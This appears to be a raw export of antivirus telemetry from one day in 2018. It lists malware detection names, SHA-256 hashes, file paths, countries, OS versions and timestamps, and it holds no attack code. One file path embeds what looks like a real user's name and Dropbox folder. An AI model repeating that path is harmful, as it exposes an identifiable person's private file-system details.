  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='15eb3c37d6bda8e312878d03029d29c179720763c0370ba35b782a29961cab24', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T13:19:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-112516-3aad6747', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-112357-335C6E3C\\AVSCAN-20181102-112516-3AAD6747', filesize=1088000, name='EXP/Excel.Exploit.Gen.#M1.#R1'), hash='46fca5e52395ecf0f3467a783e0bffb96a30de97377a885a87b67b367c7c014a', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:25:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-035704-31643af4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03248238\\AVSCAN-20181102-035515-1A5A3B07\\AVSCAN-20181102-035704-31643AF4', filesize=576000, name='TR/Agent.2d9bff.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:57:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4589636b9b84557dd4b31cb6feb6c11f1775f16970167f9b466e7ed7277ac65b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-25\\4589636B9B84557DD4B31CB6FEB6C11F1775F16970167F9B466E7ED7277AC65B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4589636b9b84557dd4b31cb6feb6c11f1775f16970167f9b466e7ed7277ac65b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:02:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123759-5d0e99f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_15112874\\AVSCAN-20181102-123746-5A66D208\\AVSCAN-20181102-123759-5D0E99F2', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:38:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dark_tommy.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\SKINS\\Dark_Tommy\\Dark_Tommy.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134359-9441d777', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134359-9441D777', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:03:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102018-a15398b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-102018-A15398B7', filesize=64000, name='TR/Siggen.64000.4.#M1.#R1'), hash='1a0201670260af68cb64af6267548b81214dc43129bf9e200edad39000c22236', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:20:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0c17335b378c7ebed353d99e40cca532cde33076', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\0c17335b378c7ebed353d99e40cca532cde33076', filesize=196000, name='PUA/InstallCore.Gen2.#M1.#R1'), hash='03074ae84126999407eb454686c174cf93648dd3c1c27522a694ff83c2b0ac8b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:25:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140203-c93e7ce9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-140203-C93E7CE9', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:05:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tprecpfs5_01079.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Testing Program 2016 Cloud\\Visor\\Flash\\TPRECPFS5_01079.exe', filesize=428000, name='HEUR/APC.#M1.#R1'), hash='53c7bb5198c903c40c426f514f0e95260bcdc1c1f6b16e01e616a1f1bae93784', metadata=Row(cmdline=None, country='SV', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:27:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140639-fc867623', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-140639-FC867623', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:09:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='d3dx9.dll', filepath='C:\\Users\\X\\Desktop\\Vape Cracked 2.47\\1.7.10\\d3dx9.dll', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:41:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055208-679a6710', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055208-679A6710', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055218-6da788ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055218-6DA788ED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052131-20f43400', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052131-20F43400', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Program Files (x86)\\ProKAward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:42:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053130-85b8368c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053130-85B8368C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf_contract agreement.tar --> j111.exe', filepath='pdf_CONTRACT AGREEMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:18:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131149-9948a7d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-131149-9948A7D4', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:14:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-215150-2aaeded7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d1d9e4d6\\AVSCAN-20181102-214641-FAB0748F\\AVSCAN-20181102-215150-2AAEDED7', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:51:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061222-3b2116e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061222-3B2116E7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120606-18212a88', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120606-18212A88', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151422-ef877006', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-151422-EF877006', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:17:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125610-ead7cf9e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-125610-EAD7CF9E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:59:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151024-c337b0a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-151024-C337B0A4', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:13:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000008a8', filepath='C:\\Windows\\Temp\\tmp00000098\\tmp000008a8', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T19:44:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='C:\\Program Files\\ProKAward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:10:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050757-3b78478f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050757-3B78478F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140801-0bb75478', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-140801-0BB75478', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:11:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.741\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.741\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T08:36:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052320-61f0d99f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052320-61F0D99F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055127-4efbb4a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055127-4EFBB4A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052947-48a2bd32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052947-48A2BD32', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061013-ee428efb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061013-EE428EFB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062059-6f79cf8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062059-6F79CF8F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061907-2cac9578', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061907-2CAC9578', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053650-445f0271', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053650-445F0271', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062022-599fd270', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062022-599FD270', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051430-25fc66de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051430-25FC66DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061012-edd92976', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061012-EDD92976', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061846-2050f8b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061846-2050F8B9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061122-174682a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061122-174682A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061818-0f7d3e5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061818-0F7D3E5D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061349-6f6570d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061349-6F6570D2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:48Z'), dt=datetime.date(2018, 11, 2)),
